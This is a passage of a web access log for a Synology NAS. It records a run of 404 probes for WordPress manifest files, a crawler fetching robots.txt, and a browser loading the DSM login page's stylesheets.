+[25/Jan/2026:20:40:29 +0000] - 404 404 - GET https profibot.synology.me "//media/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:29 +0000] - 404 404 - GET https profibot.synology.me "//wp2/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:30 +0000] - 404 404 - GET https profibot.synology.me "//site/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:30 +0000] - 404 404 - GET https profibot.synology.me "//cms/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:30 +0000] - 404 404 - GET https profibot.synology.me "//sito/wp-includes/wlwmanifest.xml" [Client 208.84.101.154] [Length 11939] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[25/Jan/2026:20:40:30 +0000] - - 400 - - https profibot.synology.me "-" [Client 208.84.101.154] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[26/Jan/2026:03:33:17 +0000] - - 301 - GET http profibot.synology.me "/" [Client 121.127.34.151] [Length 166] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 LBBROWSER" "-" +[26/Jan/2026:03:33:18 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 121.127.34.151] [Length 12685] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 LBBROWSER" "http://profibot.synology.me/" +[27/Jan/2026:02:52:25 +0000] - 200 200 - GET https profibot.synology.me "/robots.txt" [Client 74.7.228.29] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[27/Jan/2026:09:56:09 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 54.205.198.168] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36" "-" +[27/Jan/2026:18:24:11 +0000] - 200 200 - GET https profibot.synology.me "/robots.txt" [Client 74.7.228.29] [Length 26] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[28/Jan/2026:01:28:59 +0000] - 200 200 - GET https profibot.synology.me "/" [Client 91.98.176.86] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/unsupported-browsers/dist/bundle.css?v=1661421011" [Client 91.98.176.86] [Length 590] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3/ux/ux-all.css?v=1650348555" [Client 91.98.176.86] [Length 25110] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/synoSDSjslib/sds.css?v=1654081517" [Client 91.98.176.86] [Length 8242] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/scripts/ext-3.4/resources/css/ext-all.css?v=1650348555" [Client 91.98.176.86] [Length 12533] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/scripts/syno-vue-components/style/syno-vue-components.css?v=1652869476" [Client 91.98.176.86] [Length 26445] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/scripts/scrollbar/flexcroll.css?v=1650348555" [Client 91.98.176.86] [Length 360] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/desktop/dist/style.css?v=1661421011" [Client 91.98.176.86] [Length 4183] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/taskbar/dist/style.css?v=1661421011" [Client 91.98.176.86] [Length 6059] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/login/dist/style.css?v=1661421011" [Client 91.98.176.86] [Length 6016] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/resources/css/desktop.css?v=1661421011" [Client 91.98.176.86] [Length 11272] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ExternalDevices/style.css?v=1661421011" [Client 91.98.176.86] [Length 1004] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/HotkeyManager/style.css?v=1661421011" [Client 91.98.176.86] [Length 1136] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SupportForm/style.css?v=1661757678" [Client 91.98.176.86] [Length 494] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/C3/style.css?v=1661421011" [Client 91.98.176.86] [Length 780] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DataDrivenDocuments/style.css?v=1661421011" [Client 91.98.176.86] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ActiveInsightUpdateNotify/style.css?v=1661421011" [Client 91.98.176.86] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PollingTask/style.css?v=1661757678" [Client 91.98.176.86] [Length 609] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/LogCenter/style.css?v=1657013615" [Client 91.98.176.86] [Length 2048] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PersonalSettings/style.css?v=1661757678" [Client 91.98.176.86] [Length 4474] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DiskMessageHandler/style.css?v=1661421011" [Client 91.98.176.86] [Length 575] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SecurityScan/style.css?v=1652943644" [Client 91.98.176.86] [Length 4601] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/VideoPlayer2/style.css?v=1649656611" [Client 91.98.176.86] [Length 1998] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/EnableNewUpdateSetting/style.css?v=1661421011" [Client 91.98.176.86] [Length 983] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SystemInfoApp/style.css?v=1661421011" [Client 91.98.176.86] [Length 2735] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PkgManApp/style.css?v=1661757678" [Client 91.98.176.86] [Length 5292] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ClipBoardJS/style.css?v=1661757678" [Client 91.98.176.86] [Length 387] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/PhotoViewer/style.css?v=1661757678" [Client 91.98.176.86] [Length 3361] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DesktopProgress/style.css?v=1661757678" [Client 91.98.176.86] [Length 860] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/StorageManager/style.css?v=1661421011" [Client 91.98.176.86] [Length 28078] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/FileChooserV6/style.css?v=1661757678" [Client 91.98.176.86] [Length 1098] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/SharingManager/style.css?v=1661757678" [Client 91.98.176.86] [Length 229] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ResourceMonitor/style.css?v=1661421011" [Client 91.98.176.86] [Length 6761] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/TaskSchedulerUtils/style.css?v=1661757678" [Client 91.98.176.86] [Length 104] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/OTPWizard/style.css?v=1661757678" [Client 91.98.176.86] [Length 870] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/MyDSCenter/style.css?v=1661757678" [Client 91.98.176.86] [Length 0] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/UpdateMaskApp/style.css?v=1661421011" [Client 91.98.176.86] [Length 481] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/Widgets/style.css?v=1661421011" [Client 91.98.176.86] [Length 3239] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:00 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/WelcomeApp/style.css?v=1661421011" [Client 91.98.176.86] [Length 10609] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/HelpBrowser/style.css?v=1661757678" [Client 91.98.176.86] [Length 5614] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DSMNotify/style.css?v=1661757678" [Client 91.98.176.86] [Length 2159] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/AudioPlayer/style.css?v=1661757678" [Client 91.98.176.86] [Length 3921] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/Utils/style.css?v=1661757678" [Client 91.98.176.86] [Length 2311] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/BackgroundTaskMonitor/style.css?v=1661757678" [Client 91.98.176.86] [Length 1934] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/AdminCenter/style.css?v=1661226912" [Client 91.98.176.86] [Length 15876] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/DisableAdminNotification/style.css?v=1661421011" [Client 91.98.176.86] [Length 440] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/TaskSchedulerWidget/style.css?v=1661421011" [Client 91.98.176.86] [Length 989] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/BandwidthControl/style.css?v=1634102886" [Client 91.98.176.86] [Length 72] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ConfigBackup/style.css?v=1660704937" [Client 91.98.176.86] [Length 1239] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/ResetAdminApp/style.css?v=1661421011" [Client 91.98.176.86] [Length 514] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/FileChooser/style.css?v=1661757678" [Client 91.98.176.86] [Length 943] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/TinyMCE/style.css?v=1635321605" [Client 91.98.176.86] [Length 4624] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/modules/Share/style.css?v=1661757678" [Client 91.98.176.86] [Length 1433] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/ScsiTarget/style.css?v=1659958512" [Client 91.98.176.86] [Length 7620] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/OAuthService/style.css?v=1618330426" [Client 91.98.176.86] [Length 345] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/FileBrowser/style.css?v=1657097204" [Client 91.98.176.86] [Length 12126] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/FileTaskMonitor/style.css?v=1657097197" [Client 91.98.176.86] [Length 644] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyPhotos/style.css?v=1733908506" [Client 91.98.176.86] [Length 56578] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/AudioStation/style.css?v=1670317322" [Client 91.98.176.86] [Length 17366] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/CloudSync/style.css?v=1744186293" [Client 91.98.176.86] [Length 8535] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/LogCenter/style.css?v=1657880510" [Client 91.98.176.86] [Length 580] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/WebStation/style.css?v=1648710000" [Client 91.98.176.86] [Length 4262] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/CodecPack/style.css?v=1662540402" [Client 91.98.176.86] [Length 673] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/HybridShare/style.css?v=1761112552" [Client 91.98.176.86] [Length 1165] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyDrive-ShareSync/style.css?v=1731304858" [Client 91.98.176.86] [Length 3834] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:01 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynoFinder/style.css?v=1670389783" [Client 91.98.176.86] [Length 22699] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:02 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/SynologyApplicationService/style.css?v=1675505560" [Client 91.98.176.86] [Length 2208] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "https://profibot.synology.me/" +[28/Jan/2026:01:29:02 +0000] - 200 200 - GET https profibot.synology.me "/webman/3rdparty/VPNCenter/style.css?v=1656648365" [Client 91.98.176.86] [Length 1201] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 